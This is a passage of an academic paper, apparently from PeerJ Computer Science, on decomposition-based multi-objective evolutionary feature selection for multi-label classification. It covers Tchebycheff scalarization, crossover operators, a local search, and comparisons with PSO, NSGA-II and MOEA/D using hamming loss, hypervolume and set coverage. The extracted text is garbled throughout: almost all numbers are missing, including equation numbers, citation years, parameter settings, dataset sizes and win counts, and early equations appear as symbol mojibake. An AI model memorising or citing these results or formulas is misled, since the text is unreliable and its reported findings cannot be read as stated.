into a single-objective problem. one of these methods is the tchebycheff method (jaszkiewicz, ), which was used in this study to solve multi- objective subproblems. the tchebycheff method looks for the optimal solutions that have the minimum distance from a reference point. the single-objective optimization problem is defined as eq. ( ). minimize gteðxj�o; z�Þ ¼ maxf�ijfiðxÞ � z�i jg subject to x s; ( ) where z� = (z �,…,zm�) t is a reference point used to evaluate the quality of the obtained solutions, m is the number of objective functions, and s is the search space. according to this equation, the distances between the objective function values of each solution x and reference point z� are calculated. the single-objective optimization problem is regarded as minimizing the maximum of these distances. a uniform weight vector λ = (λ , λ ,…, λm) is defined for each solution such that pm i �i ¼ . therefore, weight λi is assigned to the objective function fi. to obtain each optimal solution of the minimization problem defined in eq. ( ), we need to find an appropriate weight vector. the obtained optimal solution would be one of the pareto optimal solutions. as a result, the traditional methods are time-consuming because of continuous changes in the weights required to obtain the best solutions. therefore, we consider a set of distributed weight vectors in the decomposition-based evolutionary methods for all the subproblems. reference point selection is another issue that should be considered in the tchebycheff method. for a minimization problem, the minimum value obtained for each objective function can be a reference point. z�i ¼ minfiðxÞjx s ( ) therefore, the value of the reference point is also updated after each iteration. 
figure shows the tchebycheff method for obtaining an optimal solution on the pareto front. as an example, we show that the reference point has been placed at the center of the coordinates, where the values of both objective functions are minimal. we show a sample asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weight vector (λ , λ ), and the solutions from each iteration are shown in blue. the solutions converge toward the reference point in the direction of the weight vector until the optimal point on the pareto front (in red) is obtained. at each iteration, the previous solution is replaced with a new solution if the new one outperforms the previous one. multi-label feature selection using multi-objective evolutionary algorithms a review of the literature shows little research in the area of multi-label feature selection using multi-objective evolutionary algorithms. next, we briefly explain the state-of-the-art methods. multi-label feature selection algorithm based on nsga-ii yin, tao & xu ( ) have selected the optimal features for multi-label data classification using the nsga-ii algorithm. the hamming loss and the average precision criteria have been considered as the objective functions. this paper has yielded the pareto front using the nsga-ii algorithm. nsga-ii uses fast non-dominated sorting to rank feature subsets. the fast non-dominated sorting technique categorizes the population members in different ranks. for each solution p, the number of members for which solution p dominates and the number of members that dominate solution p are specified. all solutions that have never been dominated (members with a domination count of zero) are added to a set named f . here, f is the first pareto front that contains the best- qualified members of the current population. in the next step, the members included in f are removed from the population, and the remaining members that have never been dominated construct the second rank f . this procedure continues in the same way until all population members are ranked. at the end of the algorithm, the members of the first front f are presented as the optimal pareto front. the proposed method was tested on multi-label standard data optimal point ( , ) z* ( ) ( ) figure illustration of tchebycheff method. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classified using the ml-knn classifier. the authors compared the proposed method with several filter-based feature selection methods. pso-based multi-objective multi-label feature selection pso is a well-known population-based evolutionary algorithm. zhang et al. ( ) presented a multi-objective pso-based method for feature selection of multi-label data. they considered the number of features and accuracy of classification as conflicting objectives. in the pso algorithm, population consists of particles that have two properties: position and velocity. the position and the velocity of the i-th particle are presented as pi(t) = (pi, , pi, ,…, pi,d) and vi(t) = (vi, , vi, ,…, vi,d), respectively. the position of the particle is updated based on the previous position and velocity. moreover, the particle velocity is updated according to eq. 
based on two parameters: (1) the best position found so far by the particle itself, lbi(t) = (lbi,1, lbi,2, ..., lbi,d), and (2) the best global position among all particles, gb(t) = (gb1, gb2, ..., gbd):

$v_{i,j}(t+1) = w\, v_{i,j}(t) + r_1 c_1 (lb_{i,j}(t) - p_{i,j}(t)) + r_2 c_2 (gb_j(t) - p_{i,j}(t))$  (10)

$p_{i,j}(t+1) = p_{i,j}(t) + v_{i,j}(t+1)$  (11)

where t is the iteration number; r1 and r2 are two random vectors uniformly distributed in the range (0, 1); c1 and c2 are two parameters that represent the particle's confidence in itself and in the swarm, respectively; and w, called the inertia weight, determines the effect of the previous velocity. generating an initial population is the first step of pso-based multi-label feature selection; then an archive of nondominated solutions is maintained. the velocities and positions of all particles are updated in each iteration, together with each particle's best individual position and the best global position: the particle's best individual position is determined using the domination concept, and the best global position is selected among the particles' historical positions using the crowding distance criterion. an adaptive mutation operator is used to produce offspring; the number of mutated elements in a particle is determined by a non-linear function, and for this purpose k variables of some particles are randomly selected to be reinitialized. the method was evaluated on standard benchmark problems using the ml-knn classifier, and the results show significant improvements compared to the previous state-of-the-art methods.
proposed method
decomposition methods (such as the tchebycheff method) are traditional methods of multi-objective optimization; they transform the approximation of the pareto front into a number of scalar optimization problems. as mentioned before, because of the continuous modification of the objective-function weights needed to obtain each pareto solution, these methods may be time-consuming, and some of them cannot discover all pareto points of non-convex problems effectively (zhang & li, ). an evolutionary algorithm can be used to overcome this problem. recently, a method based on decomposition and evolutionary algorithms (moea/d) was proposed for solving multi-objective problems (zhang & li, ). moea/d uses evolutionary algorithms to decompose the problem space into scalar subproblems and solves them simultaneously; hence, it increases the speed of finding pareto-optimal solutions and improves the diversity of the obtained solutions (zhang, gong & rong, ). the scalar subproblems are solved simultaneously by receiving information from neighboring subproblems; therefore, the algorithm has less computational complexity than the domination-based algorithms. moea/d has several further advantages over pareto dominance-based algorithms, such as computational efficiency, scalability to optimization problems with many objectives, and high search ability for combinatorial optimization problems (jiang et al., ). in this article, we propose a decomposition-based multi-objective feature selection method for multi-label data classification; this is the first time that a decomposition-based approach has been customized to tackle multi-label classification. the figure below shows the overall flowchart of the proposed method.
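the subproblem update in that flowchart relies on the tchebycheff scalarization of eq. (8) and the reference-point rule of eq. (9). a short illustrative python sketch of these two ingredients is given below; the numbers are toy values, not results from the experiments.

```python
import numpy as np

def tchebycheff(f, lam, z_star):
    """g_te(x | lambda, z*) of eq. (8) for one objective vector f."""
    return np.max(lam * np.abs(np.asarray(f) - np.asarray(z_star)))

def update_reference_point(z_star, f_new):
    """eq. (9): keep the component-wise minimum seen so far (minimization)."""
    return np.minimum(z_star, f_new)

# uniformly spread weight vectors for a bi-objective problem (one per subproblem)
n_sub = 5
weights = np.stack([np.linspace(0, 1, n_sub), 1 - np.linspace(0, 1, n_sub)], axis=1)

z = np.array([np.inf, np.inf])
for f in [np.array([0.30, 0.60]), np.array([0.25, 0.70]), np.array([0.40, 0.20])]:
    z = update_reference_point(z, f)
print("z* =", z)
print("g_te per subproblem:", [round(tchebycheff([0.3, 0.6], w, z), 3) for w in weights])
```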
figure: flowchart of the overall structure of the proposed method (encoding; initialization of the population, weight vectors and reference point; fitness evaluation of each feature subset by the number of features and the hamming loss; reproduction using the proposed genetic operators; replacement of neighbors based on the tchebycheff value; reference-point update; local search to improve the pareto front; output of the pareto front of trade-off solutions).
according to the overall structure, the search process needs an encoding strategy to define the search space, which is explained in the next subsection. the algorithm, as an iterative process, starts with an initialization step. at each
the hamming loss evaluates the fraction of misclassified instance-label pairs, that is, a relevant label is missed or an irrelevant one is predicted (zhang & zhou, ). the hamming loss is defined as follows:

$$\mathrm{hloss}(h) = \frac{1}{p} \sum_{i=1}^{p} \frac{1}{q}\, \lvert h(x_i)\, \Delta\, y_i \rvert,$$

where q is the number of labels and p is the total number of multi-label samples. if $x_i$ denotes the i-th sample, $h(x_i)$ represents the labels predicted by model h, $y_i$ are the actual labels of the i-th sample, and Δ is the symmetric difference between the predicted and actual label vectors. the hamming loss is our second objective function for feature selection; hence, multi-objective optimization can be applied to minimize this objective as well. according to the definitions of the two objective functions, the proposed method attempts to find feature sets with a minimum number of features and a minimum classification error.

algorithm. pseudo-code for the proposed method.
  input: np: the number of subproblems; t: the number of neighbors in the decomposition-based optimization algorithm; k: the number of neighbors in the multi-label knn classifier; r: the number of iterations
  output: final feature selection subsets
  // initialization
  divide the multi-label data into training and test sets;
  produce the weight vectors from uniformly distributed aggregation values;
  generate the initial population uniformly at random;
  evaluate the objective functions of each candidate solution according to (eq. ) using the training set;
  compute the t neighbors of each weight vector using the euclidean distance;
  initialize the reference point according to (eq. );
  determine the non-dominated solutions in the initial population as an archive (ac);
  it = 0;
  // main algorithm
  while it < r do
    for i = 1 to np do                         // for each individual x_i in the population
      // regeneration
      randomly select two candidate solutions from among the neighbors of x_i;
      produce two new candidate solutions y_1, y_2 using the proposed genetic operators;
      // comparison and replacement (eq. )
      for j = 1 to t do                        // for each neighbor
        if g_te(y_1 | w_j, z) <= g_te(x_j | w_j, z) then x_j = y_1 end
        // update the reference point (eq. )
        if f_1(y_1) < z_1 then z_1 = f_1(y_1) end
        if f_2(y_1) < z_2 then z_2 = f_2(y_1) end
        if g_te(y_2 | w_j, z) <= g_te(x_j | w_j, z) then x_j = y_2 end
        // update the reference point (eq. )
        if f_1(y_2) < z_1 then z_1 = f_1(y_2) end
        if f_2(y_2) < z_2 then z_2 = f_2(y_2) end
      end
    end
    // local search and obtaining the final pareto front
    separate the non-dominated solutions from the updated population (ns);
    separate the non-dominated solutions from ac and ns (ep);
    select the solution with the maximum crowding distance (x_cr) and two random solutions x_n1, x_n2 from ep;
    produce a new solution by using (eq. );
    select the non-dominated solutions from ep and x̄ as the final pareto set;
    update the archive;
    it = it + 1;
  end
  obtain the hamming loss on the test data with the selected features of the solutions in the final pareto front.

[figure: an instance of a feature selection representation.]

the proposed genetic operators

in this paper, we introduce a pool of crossover operators to combine the benefits of various operators and produce better solutions. three genetic operators (single-point, double-point, and uniform crossover) are used to produce a new generation of candidate solutions. in each iteration, one of these crossover operators is selected: a random number p between 0 and 1 is generated as the selection probability, and the selection ranges are specified by p_1 and p_2, which can be determined in the experiments. if the generated number is less than p_1, the single-point crossover is applied to the parent solutions: a random point is selected and the tails of the two parents are swapped to generate new offspring. the double-point crossover is selected if p lies between p_1 and p_2; it is a generalization of the single-point crossover in which alternating segments are swapped to generate new offspring. a probability greater than p_2 causes the selection of the uniform crossover, which swaps material between the parents by drawing, for each variable, a uniform random real number between 0 and 1 that decides whether the first child takes the i-th gene from the first or the second parent: if the random number is greater than 0.5, the first parent's variable is selected, and vice versa. figure shows the process of selecting crossover operators. [figure: the process of selecting crossover operators; a real random number p is produced, and p ≤ p_1 selects the single-point, p_1 < p ≤ p_2 the double-point, and p > p_2 the uniform crossover.] a uniform mutation is then applied to a newly produced individual to guarantee diversity: a random number of features is selected from the generated subset, and the values of the corresponding variables are replaced with new uniform random numbers between 0 and 1.

local search

the domination concept is used to separate the best candidate solutions at the end of each iteration, and all dominated solutions are omitted from the population. to improve the pareto front obtained by the decomposition-based algorithm, a local search (zhang et al., ) is applied to produce a candidate solution in a region of the search space with a large crowding distance. we estimate the density of solutions surrounding each solution; producing a new solution in an area with lower density is desirable. for this purpose, at the end of each iteration, the final pareto front is saved in the archive (ac). the solution with the maximum crowding distance (x_cr) is selected among the non-dominated solutions of the pareto front obtained from the current generation and the solutions in the archive (from previous generations). a new solution is produced from x_cr and two random solutions x_n1 and x_n2 based on the following equation:

$$\bar{x}_i = x_{cr} + F \cdot (x_{n_1} - x_{n_2})$$

parameter F is a scale factor that amplifies the difference between the two vectors.
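the reproduction and local-search operators described above can be summarized in a compact sketch; the operator-selection thresholds p1 and p2, the mutation rate, and the scale factor f are illustrative assumptions (the paper determines them experimentally).

```python
import numpy as np

# compact sketch of the reproduction and local-search operators described above;
# p1, p2, the mutation rate and f are illustrative assumptions, not the paper's values.
def crossover(a, b, p1=0.3, p2=0.6, rng=None):
    rng = rng or np.random.default_rng()
    d, p = len(a), rng.random()
    if p <= p1:                                   # single-point crossover
        cut = rng.integers(1, d)
        c1 = np.concatenate([a[:cut], b[cut:]])
        c2 = np.concatenate([b[:cut], a[cut:]])
    elif p <= p2:                                 # double-point crossover
        i, j = sorted(rng.choice(d, size=2, replace=False))
        c1, c2 = a.copy(), b.copy()
        c1[i:j], c2[i:j] = b[i:j], a[i:j]
    else:                                         # uniform crossover
        m = rng.random(d) > 0.5
        c1, c2 = np.where(m, a, b), np.where(m, b, a)
    return c1, c2

def uniform_mutation(x, rate=0.02, rng=None):
    rng = rng or np.random.default_rng()
    x = x.copy()
    m = rng.random(len(x)) < rate                 # randomly chosen positions
    x[m] = rng.random(m.sum())                    # re-draw them uniformly in [0, 1)
    return x

def local_search_move(x_cr, x_n1, x_n2, f=0.4):
    # de-inspired move around the least-crowded nondominated solution
    return np.clip(x_cr + f * (x_n1 - x_n2), 0.0, 1.0)
```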
the final pareto front will include the nondominated solutions among the newly produced solutions of the local search and ac; this local search is inspired by the differential evolution (de) algorithm (price, storn & lampinen, ).

overall structure of the proposed method

in the proposed method, the multi-objective problem is divided into scalar subproblems, and the best solution of each subproblem is searched simultaneously using an evolutionary algorithm. an appropriate pareto front is achieved by solving all subproblems. figure illustrates the general idea for a minimization problem with two objectives and several subproblems: a composition function g converts the two objectives (f_1 and f_2) into one scalar objective, and there is a vector (with as many dimensions as objectives) that weights each objective in the composite function. according to the figure, the search space is divided into sections using uniformly distributed aggregation weight vectors; each section has a different weight vector, and each weight vector determines a search direction. the weight vectors are generated using das and dennis' method (das & dennis, ), applying a uniform distribution scheme. let n be the number of subproblems and λ_1, λ_2, …, λ_n be the weight vectors, where each weight takes a value from {0, 1/n, 2/n, …, 1} and the components of every weight vector sum to one. in the proposed method, the first component of a weight vector is the weight of the first objective (the number of features) and the second component is the weight of the second objective (the hamming loss). [figure: distribution of weight vectors in a minimization problem.]

each subproblem includes the following parts:
• an individual x_i
• the objective functions (i.e., the number of features and the hamming loss)
• a weight vector λ_i
• the neighborhood of subproblem i
• the composite objective function g_te based on eq. ( ).

the number of subproblems is usually taken to be equal to the population size. in each generation, we form a population of the best solutions found for each subproblem. the neighborhood relations among subproblems are defined based on the distance between their weight vectors. during the search, new solutions are produced for each subproblem through the cooperation of neighborhood members, using the proposed genetic operators (selection, crossover, and mutation). the new solutions compete with the neighbors of the old solutions; specifically, we compare the weighted combinations of the two objective functions for different solutions. the function weights indicate the direction in which the population moves to find an optimal solution. the steps of the proposed algorithm are explained in detail below.

step 1. initialization: in this step, the subproblems are initialized. the proposed method starts by generating an initial population and the weight vectors. the structure of each solution in the population is described in "representation of individuals". a weight vector corresponding to every subproblem is used to convert the multi-objective problem into a single-objective problem via the tchebycheff method.
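a minimal sketch of the decomposition machinery for the bi-objective case (uniformly distributed weight vectors, neighborhoods, and the tchebycheff scalarization) is given below; the function names are illustrative and the tchebycheff form follows the usual weighted distance-to-reference-point definition referred to above.

```python
import numpy as np

# sketch of the decomposition machinery described above (bi-objective case);
# function names are illustrative, not the authors' code.
def weight_vectors(n):
    """uniformly distributed aggregation weights for two objectives."""
    w1 = np.linspace(0.0, 1.0, n)            # weight of objective 1 (feature ratio)
    return np.column_stack([w1, 1.0 - w1])   # components of each vector sum to one

def neighbors(weights, t):
    """indices of the t closest weight vectors (euclidean distance) per subproblem."""
    d = np.linalg.norm(weights[:, None, :] - weights[None, :, :], axis=-1)
    return np.argsort(d, axis=1)[:, :t]

def tchebycheff(f, w, z):
    """g_te(x | w, z) = max_i w_i * |f_i(x) - z_i| for an objective vector f."""
    return np.max(np.asarray(w) * np.abs(np.asarray(f) - np.asarray(z)))
```

a new offspring y then replaces neighbor j whenever tchebycheff(f(y), w[j], z) <= tchebycheff(f(x_j), w[j], z), mirroring the comparison step of the algorithm.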
as a result, the number of subproblems, the number of candidate solutions in the population, and the number of weight vectors are the same. the length of the weight vector would be equal to the number of objective functions. different uniformly distributed aggregation weight vectors distribute the candidate solutions in the whole search space; hence, a pareto front with appropriate diversity is achieved. in the subproblems where larger weight values are assigned to the first objective function, the number of features becomes more important than classification performance. therefore, the composite function forces the subproblem to find solutions with fewer features. in addition, we use the neighborhood concept to produce new solutions and improve the available solutions in the decomposition-based methods. therefore, for each subproblem, the closest weight vectors are calculated based on the euclidean distance from their neighbors. the values of the objective functions for all solutions in the initial population need to be calculated. therefore, the ml-knn classifier is applied to the training data with the feature subset of each candidate solution. furthermore, at the beginning of the algorithm, the reference point should be initialized to evaluate the candidate solutions using the tchebycheff method. in the proposed method, the minimum values of the objective functions among all the obtained candidate solutions are regarded as the reference point. point z = (z , z ) is considered as the reference point, where z is the minimum number of the selected features among the obtained solutions, and z is the minimum value of the classification error. this step is shown in lines – of algorithm . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step . regeneration: producing new candidate solutions (offspring) is one of the main steps of evolutionary algorithms. in the proposed method, the genetic operators (explained in the previous section) were used to produce new offspring. at every iteration, for each available subproblem, a new candidate solution should be produced. specifically, for each subproblem, two candidate solutions are randomly selected among the subproblem’s neighbors (the closest weight vectors). then, the proposed genetic crossover operator (explained in “the proposed genetic operators”) is applied to them. furthermore, a uniform mutation is used. the current candidate solution and all the neighbors are replaced with the newly obtained candidate solution if the new candidate solution performs better. this step is shown in lines – of algorithm . step . comparison and replacement: because of the conflicting objectives in multi- objective optimization problems, the comparison of the candidate solutions is always challenging. to compare the new candidate solution with the available ones, we use a decomposition-based method. specifically, the decomposition method tries to combine the objective functions and achieve a scalar function for making the comparison possible. here, different combination methods can be used. the proposed method uses the tchebycheff method to combine the objective functions. as mentioned in “tchebycheff method”, this method considers the distances between the objective values and the reference point. the distances of the first objective value (number of features) have larger values than the hamming loss, and this affects the performance of the tchebycheff method. 
therefore, it is better to normalize the obtained values of the objective functions. the tchebycheff value for the new candidate solution is calculated using the weight vector of the current solution. then, the new solution is compared with the current solution and any of its neighbors. the new solution replaces them if it is better than the previous solutions. finally, we expect to achieve a population with an improved generation. the population contains the best solution for each subproblem found so far. whenever a new solution is produced, the reference point also needs to be updated. these steps are shown in lines – of algorithm . step . local search and obtaining the pareto front: to increase the efficiency of the proposed algorithm, we use a local search with the concept of crowding distance. the details of the local search are given in “local search”. the final set of nondominated solutions will be obtained from the archive. these steps are shown in lines – of algorithm . as it is mentioned before, a set of non-dominated solutions are obtained at the last part of the search process. these solutions are trade-off feature subsets with a variety of number of features and classification performance. a user has different options and accordingly can make a decision based on corresponding application. for example, if the user prefers less computational complexity, he/she can select one of the small subsets with a small value of sacrificing the classification accuracy. multi-criteria decision making (mcdm) (velasquez & hester, ) is a process to rank and select from a set of candidate solutions with conflicting and non-commensurable criteria as an example, vikor (bidgoli et al., ) is one of such methods which ranks the multi-criteria solutions based asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the particular measure of closeness to the ideal point (a constructed point using minimum value of each objective). experimental design datasets for many applications, standard multi-label datasets are available. for each application, several datasets were selected to evaluate the proposed method. we consider the eight real- world multi-label datasets presented in table . these are complex datasets with many labels and features. the feature numbers ranged between and , . thus, feature selection in such datasets is considered as a large-scale optimization problem. moreover, the number of labels is between and . two datasets were selected from the field of biology. the first one is the yeast dataset (elisseeff & weston, ). in this dataset, genes can be placed in different activity groups. genbase is another dataset in the field of biology, which is related to the protein families (diplaris et al., ). there are different groups of protein structures defined in this dataset. every protein fiber can belong to one or several structures. in image classification, two datasets are used, scene (boutell et al., ) and flags (dheeru & karra taniskidou, ). the scene dataset is related to the categories of desert, beach, mountain, etc. for example, a scene image can have the labels of “mountain” and “sea” at the same time. the flags dataset contains information on flag images of different countries. in addition, we use multi-label text classification datasets to evaluate the efficiency of the proposed algorithm. the medical dataset (pestian et al., ) includes the classification of radiological reports in different categories. 
the enron (klimt & yang, ) dataset is another text classification dataset that includes the categories of the collected emails. in audio classification, the emotions dataset includes the categories of feelings in music (trohidis et al., ). the features of music have been extracted and categorized into categories of feelings (surprised, amazed, happy, pleased, calm, relaxing). each piece of music can include more than one feeling. the birds dataset (briggs et al., ) is related to the classification of birds using their recorded sounds. this dataset categorizes species of birds. table multi-label datasets used in the experiments. datasets domain #training instances #test instances #labels #features emotions music scene image , , flags image yeast biology , birds audio genbase biology , medical text , enron text , , asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental setup the multi-label dataset should be divided into training and test sets to evaluate the proposed method. during the optimization process, the performance of the selected features is evaluated by computing the accuracy of classification on training data. the test set is used to evaluate the obtained features and to report the final results at the end of the algorithm. the number of the training and test samples for each dataset is provided in table . the splitting of data into test and train subsets is based on the mulan library (tsoumakas et al., ), which provided these datasets. the classifier algorithm used in multi-label learning is the ml-knn classifier. to simplify the evaluation process, euclidean distance with k = was used in this study (zhang & zhou, ). some parameters need to be adjusted before the implementation of the proposed algorithm. the population size and the number of the function evaluations used were and , , respectively, for all methods. the algorithms were run times independently for each dataset. in the proposed method, the number of neighbors, t, was set to . the mutation rate in the genetic operators was . . to increase the diversity of solutions, a random number between . and . was used as the value of parameter f in the local search based on zhang et al. ( ). finally, the values of parameters p and p for selecting the crossover operator were set to . and . , respectively. results and discussion each dataset introduced in the previous section was given to the algorithm as the input data for evaluating the proposed method. then, a set of nondominated solutions was reported at the end of the algorithm. for each dataset, the algorithms were run for independent runs, and we obtained pareto fronts. the nondominated solutions in the union set of all pareto fronts were determined as the best pareto front. therefore, all comparisons were carried out between the best pareto fronts of the methods. the proposed method has been compared with the pso-based algorithm (zhang et al., ) and the nsga-ii-based (yin, tao & xu, ) multi-label feature selection algorithm, which are explained in “multi-label feature selection using multi-objective evolutionary algorithms” and the main version pf moea/d algorithm. assessment metrics a comparison of the multi-objective optimization methods in various applications is always challenging. therefore, we should find assessment metrics that facilitate the comparison. in this study, we used an extensive set of measures to evaluate the efficiency of the proposed algorithm. 
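several of the measures described next operate on nondominated sets, for example when the best pareto front is formed from the union of the fronts of all independent runs; a small sketch of that filtering step (minimization objectives, illustrative naming) is shown below.

```python
import numpy as np

# sketch: keep only the nondominated points (minimization) from a union of fronts;
# the function name and its use here are illustrative assumptions.
def nondominated(points):
    pts = np.asarray(points, dtype=float)
    keep = []
    for i, p in enumerate(pts):
        # p is dominated if some other point is <= p everywhere and < p somewhere
        dominated = np.any(np.all(pts <= p, axis=1) & np.any(pts < p, axis=1))
        if not dominated:
            keep.append(i)
    return pts[keep]
```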
some assessment measures focus on one of the objective functions. the minimum number of obtained features and the minimum classification error on the training and test sets are single-objective criteria for feature selection. because there may be subsets with only a few features but a large classification error, we consider only the subsets whose classification error is lower than that obtained with all features. from the multi-objective point of view, there are many evaluation measures that compare the pareto fronts obtained by competitors (akkan & gülcü, ).

the hypervolume indicator (auger et al., ) is one of the well-known criteria for evaluating multi-objective optimization methods. it assesses an algorithm according to both the diversity of its solutions and their convergence to the optimal pareto front. the indicator measures the volume of the n-dimensional space enclosed by a set of points, where the number of dimensions equals the number of objectives; for the feature selection problem, the volume of the two-dimensional region enclosed by the pareto solutions is calculated. the larger this region, the more widely spread the points and the closer the pareto front is to the optimal pareto front. a reference point is needed to compute this volume, and its selection is one of the challenges of the hypervolume calculation; a point with the worst obtained values of the objective functions is one option. as shown in fig. , the volume of the gray region between the solutions on the pareto front and the reference point is taken as the hypervolume indicator. [figure: hypervolume indicator; the shaded region between the pareto solutions and the reference point in the (f_1, f_2) plane.] the measure is defined as (auger et al., ):

$$HV(A) = \mathrm{vol}\!\left( \bigcup_{a \in A} [f_1(a), r_1] \times [f_2(a), r_2] \times \dots \times [f_m(a), r_m] \right),$$

where a ∈ A ranges over the solutions of the front and r = (r_1, …, r_m) is a reference point that is weakly dominated by every candidate solution.

the coverage of two sets is another metric for comparing the pareto fronts obtained by multi-objective methods (zitzler & thiele, ). this criterion uses the domination concept: coverage(a, b) for two algorithms a and b is the number of solutions on the final pareto front of algorithm a that dominate solutions on the pareto front of algorithm b; in the same way, coverage(b, a) indicates the number of solutions obtained by b that dominate the pareto points of a. to evaluate the statistical significance of the obtained results, we conducted the friedman test (calzada-ledesma et al., ) with a confidence interval of %. the ranks computed by means of this non-parametric test are reported for the obtained results. in each table, the last row indicates the statistical test results, where w/t/l represents the number of wins, ties, and losses of the proposed method compared to the other algorithms.

results and analysis

in this section, we report the results of the comparison between the proposed method and the other multi-objective methods for multi-label feature selection. table shows the minimum hamming loss on the training and test data for the different datasets.
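before turning to the result tables, the hypervolume just defined can be sketched for the bi-objective minimization case as follows; the sweep-based implementation and its name are assumptions for illustration, not the authors' code.

```python
import numpy as np

# 2-d hypervolume sketch for a minimization problem, following the definition above;
# assumes both objectives are minimized and ref is weakly dominated by every solution.
def hypervolume_2d(front, ref):
    """front: array of shape (n, 2) with (f1, f2) values; ref: (r1, r2)."""
    pts = sorted(np.asarray(front, dtype=float), key=lambda p: p[0])   # sort by f1
    hv, prev_f2 = 0.0, ref[1]
    for f1, f2 in pts:
        if f2 < prev_f2:                       # only nondominated steps add area
            hv += (ref[0] - f1) * (prev_f2 - f2)
            prev_f2 = f2
    return hv
```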
the second column indicates the classification error on the test data using all features, without feature selection. the other columns show the classification error on the training and test data when the feature selection methods are applied. the reduction of the classification hamming loss through feature selection is evidence of irrelevant features existing in all datasets. the table shows that the proposed method achieved significantly better results than the other methods on the training set: it obtained a smaller hamming loss in out of datasets in comparison with the pso-based method, and the results are even better compared to moea/d and nsga-ii, for which it reached a lower error on out of datasets. regarding the test data, the proposed algorithm shows better performance on most of the datasets; it outperforms pso and moea/d on out of datasets, and compared to nsga-ii it has better accuracy on out of datasets.

table . comparison on the minimum hamming loss (hl) on the training and test sets for the proposed, pso-based, nsga-ii, and moea/d methods; the second column represents the hl of the classification using all features, highlighted numbers indicate which method reaches the lower hamming loss on each dataset, and the last row reports w/t/l.

if the methods were evaluated only in terms of the number of features in the obtained subsets, regardless of the classification error, solutions with few features but high classification error would be reported as desirable. therefore, to give a reasonable comparison, only solutions that achieved a lower classification error than using all features are selected, and the minimum number of selected features among these solutions is reported in table . in fact, this table represents the smallest subset of features that could obtain a classification with a hamming loss lower than using all features; the minimum number of test features in this table therefore indicates which subset with the fewest features could reach a lower error than all features on the test set. in most cases, the proposed method selected fewer features than the other methods, and the difference between the number of features selected by the proposed method and by its competitors is remarkable; e.g., the proposed method achieved a smaller hamming loss than the other methods on the test set of the birds dataset using only features, whereas this number is in the pso-based method and in nsga-ii, which means that the proposed method further reduced the number of features by one-fiftieth. in the genbase dataset, the proposed method decreased the number of features to , while the original dataset has , features.

results based on set-coverage metric

as mentioned in the previous section, the set coverage criterion is another measure used to compare the proposed method with the other multi-objective feature selection methods. table shows the values of set coverage obtained by the different methods.
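before reading the table, the coverage values can be sketched as follows, following the description of c(a, b) given above (the fraction of a's pareto solutions that dominate at least one solution of b); the helper names are illustrative assumptions.

```python
import numpy as np

# sketch of the set-coverage measure as described above (minimization objectives).
def dominates(u, v):
    u, v = np.asarray(u), np.asarray(v)
    return bool(np.all(u <= v) and np.any(u < v))

def coverage(front_a, front_b):
    """fraction of front_a's solutions that dominate at least one solution of front_b."""
    hits = sum(any(dominates(a, b) for b in front_b) for a in front_a)
    return hits / len(front_a)
```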
in this table, ‘a’ indicates the proposed method and ‘b’ the competitor; c(a, b) therefore shows the average ratio of solutions obtained by the proposed algorithm in each run that dominate the solutions of the other algorithm. the mean, median, and standard deviation of the two-set coverage values on the training and test data are reported in table . as shown in the table, the proposed method achieved results comparable to the pso-based method on the training set but a significant improvement on the test set. the results show that on the datasets with large numbers of features, such as genbase, medical, and enron, the proposed method achieved significantly better results than the others; for example, on the training results of the genbase dataset, % of the solutions of the proposed method dominate pso-based solutions, while this number is just % for the pso-based solutions. therefore, the proposed method showed high efficiency compared to the other algorithms on large-scale optimization problems.

table . comparison on the smallest feature subset with a hamming loss lower than that of all features, obtained by each method on the training and test sets; highlighted numbers indicate which method reaches the smaller feature subset on each dataset, and the last row reports w/t/l.

compared to nsga-ii and moea/d, the proposed method achieved significantly better results on all datasets, meaning that its pareto front completely dominates the solutions obtained by these algorithms. similar results are observed for the test data, which are more important than the training data: on the test data, the proposed algorithm had a higher two-set coverage value than the pso-based algorithm on all datasets except flags and emotions, and the difference on most datasets is significant. on datasets like genbase and medical, the two-set coverage of the proposed method is two times that of the competitors; for example, on the genbase dataset, the proposed method dominates % of the pso-based solutions, while the pso-based method dominates only % of the others' solutions.

table . comparison on the two-set coverage indicator for the training and test data; c(a, b) is the two-set coverage between the proposed method (a) and each competitor (b: pso-based, nsga-ii, moea/d), reported as mean, median, and standard deviation per dataset, with w/t/l in the last row. highlighted numbers indicate which method reaches the higher coverage on each dataset.

regarding the nsga-ii method, the two-set coverage of the proposed method is significantly higher on all datasets; the proposed method even reached % two-set coverage on the medical dataset, which means that all of its solutions dominated the solutions obtained by the nsga-ii algorithm in every run. the table also compares the two-set coverage of moea/d and the proposed method: on most of the datasets, the proposed method dominates all solutions obtained by the moea/d algorithm. this confirms that the modifications of the algorithm, especially the added local search, lead to finding more non-dominated solutions.

results based on hypervolume metric

the hypervolume indicator is another multi-objective measure used to compare the results of the proposed method with the other algorithms. the value of this criterion was calculated for the pareto front obtained in each run, and the mean, median, and standard deviation of the hypervolume indicator over the independent runs on each dataset are provided in table . in most of the datasets, the hypervolume indicator of the proposed method is more than . , while for the two other methods all the values are less than . ; for nsga-ii, the hypervolume values lie between . and . . the pso-based and moea/d methods outperform the proposed method in terms of the hypervolume indicator only on the flags dataset; otherwise, the proposed method had significantly better results than the other algorithms. therefore, as this measure indicates, the proposed method produces well-distributed solutions that are closer to the optimal pareto front. the ranks computed by means of the non-parametric friedman test on the two-set coverage and hypervolume metrics are reported at the end of table ; note that the smallest rank corresponds to the best-performing method.

results based on pareto fronts

